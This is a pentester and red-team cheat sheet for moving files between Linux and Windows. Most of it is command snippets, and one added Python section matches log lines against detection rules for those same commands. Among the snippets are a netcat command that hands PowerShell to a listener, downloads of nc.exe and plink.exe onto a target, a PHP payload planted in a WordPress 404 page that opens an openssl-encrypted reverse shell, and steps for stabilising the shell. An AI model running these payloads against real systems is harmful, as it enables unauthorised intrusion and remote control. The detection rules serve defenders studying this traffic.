Comprehensive guide to securely transferring files between Linux and Windows for pentesters and red teamers
Introduction
Transferring files between Linux and Windows securely is a crucial skill for pentesters and Red Teamers. This guide provides step-by-step instructions using various methods, including encrypted transfers, ensuring you can handle different scenarios effectively and securely.
File Transfer Methods
Using Python HTTP Server
On Kali:
python3 -m http.server 80
On Windows Target Machine:
powershell -c "curl http://127.0.0.1/nc.exe" -o nc.exe
Using Netcat
On Kali:
nc -nvlp 1234
On Windows Target Machine:
.\nc.exe 127.0.0.1 1234 -e powershell.exe
Using Wget
On Kali:
python3 -m http.server 443
On Target Machine:
wget http://127.0.0.1:443/shell3.elf
Using PowerShell
Download plink.exe:
curl http://127.0.0.1/plink.exe -o plink.exe
Download another tool:
iwr http://127.0.0.1/nc.exe -outf .\cute.exe
Using SCP (Secure Copy Protocol)
From Linux to Windows:
scp file.txt [email protected]:/path/to/destination
From Windows to Linux:
scp [email protected]:/path/to/source/file.txt /local/destination
Using SMB (Samba)
From Linux to Windows:
smbclient //127.0.0.1/share -U user -c "put file.txt"
From Windows to Linux:
smbclient //127.0.0.1/share -U user -c "get file.txt"
Using FTP
Start FTP server on Linux:
python3 -m pyftpdlib -p 21
On Windows Target Machine:
ftp 127.0.0.1
# Use `put` to upload or `get` to download files.
Using HTTP with Curl on Windows
On Kali:
python3 -m http.server 8080
On Windows Target Machine:
curl http://127.0.0.1:8080/file.txt -o file.txt
Using Rsync
From Linux to Windows:
rsync -avz file.txt [email protected]:/path/to/destination
From Windows to Linux:
rsync -avz [email protected]:/path/to/source/file.txt /local/destination
Using FTP via Netcat
On Kali:
nc -nlvp 9000 < file.txt
On Windows Target Machine:
nc 127.0.0.1 9000 > file.txt
Using Python FTP Client
On Linux:
python3 -m pyftpdlib -p 21
On Windows:
ftp 127.0.0.1
# Login and use `put` or `get` to transfer files.
Using Tar Over SSH
From Linux to Windows:
tar czf - file.txt | ssh [email protected] "tar xzf - -C /path/to/destination"
From Windows to Linux:
ssh [email protected] "tar czf - -C /path/to/source ." | tar xzf - -C /local/destination
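Seen from the defender's side, the commands in the sections above leave recognizable process command lines. The Python below is an added example, not part of the original guide: it runs regex rules over process-creation events, and the log layout, rule names and sample events are assumptions constructed for illustration.

```python
import re

# Rules keyed to command shapes that appear in this guide (rule names are illustrative).
RULES = [
    ("adhoc_http_server", re.compile(r"\bpython3?\s+-m\s+http\.server\b", re.I)),
    ("adhoc_ftp_server", re.compile(r"\bpython3?\s+-m\s+pyftpdlib\b", re.I)),
    ("netcat_exec", re.compile(r"\bnc(\.exe)?\b.*\s-e\s+\S+", re.I)),
    ("netcat_listener", re.compile(r"\bnc(\.exe)?\s+-[a-z]*l[a-z]*\b", re.I)),
    ("binary_download", re.compile(
        r"\b(curl|wget|iwr|invoke-webrequest)\b.*\bhttps?://\S+\.(exe|elf|dll|ps1)\b", re.I)),
    ("openssl_listener", re.compile(r"\bopenssl\s+s_server\b", re.I)),
    ("fifo_openssl_shell", re.compile(r"\bmkfifo\b.*\bopenssl\s+s_client\b", re.I)),
]

# Assumed log layout: "<timestamp> host=<h> user=<u> cmd=<command line>"
LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.+)$")

def scan(lines):
    """Return (alerts, skipped): one alert per matching line, plus the count of unparseable lines."""
    alerts, skipped = [], 0
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            skipped += 1  # keep a count so parser gaps are visible, not silent
            continue
        hits = [name for name, rx in RULES if rx.search(m["cmd"])]
        if hits:
            alerts.append({"ts": m["ts"], "host": m["host"], "user": m["user"], "rules": hits})
    return alerts, skipped

# Constructed sample events (not real telemetry); the commands are the ones shown in this guide.
SAMPLE = [
    "2024-05-01T10:00:01Z host=kali01 user=root cmd=python3 -m http.server 80",
    '2024-05-01T10:00:09Z host=ws07 user=bob cmd=powershell -c "curl http://127.0.0.1/nc.exe" -o nc.exe',
    r"2024-05-01T10:01:30Z host=ws07 user=bob cmd=.\nc.exe 127.0.0.1 1234 -e powershell.exe",
    "2024-05-01T10:02:00Z host=ws07 user=bob cmd=curl http://127.0.0.1/file.txt -o file.txt",
    "2024-05-01T10:03:00Z host=kali01 user=root cmd=nc -nlvp 9000 < file.txt",
    "garbled line without fields",
]

if __name__ == "__main__":
    found, bad = scan(SAMPLE)
    for a in found:
        print(a["ts"], a["host"], a["user"], ",".join(a["rules"]))
    print("unparseable lines:", bad)
```

The plain-text download of `file.txt` is deliberately not flagged; the `binary_download` rule keys on executable extensions, so tune that list to the environment being monitored.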
Advanced Encrypted Transfers
Using OpenSSL for Secure Transfers
On Kali:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port 1337
Start the listener with:
sudo openssl s_server -key key.pem -cert cert.pem -port 1337
Exploit Example for File Upload and Execution
On the vulnerable page (e.g., WordPress 404 page):
this is a test
<?= system('mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:1337 > /tmp/s; rm /tmp/s'); ?>
Update the 404 page, and trigger the shell by visiting:
http://localhost.htb/main/wp-content/themes/twentytwenty/404.php
Stabilizing the Shell
After getting the shell:
/usr/bin/script -qc /bin/bash /dev/null
Press CTRL + Z, then run:
stty raw -echo; fg
# Press Enter twice to stabilize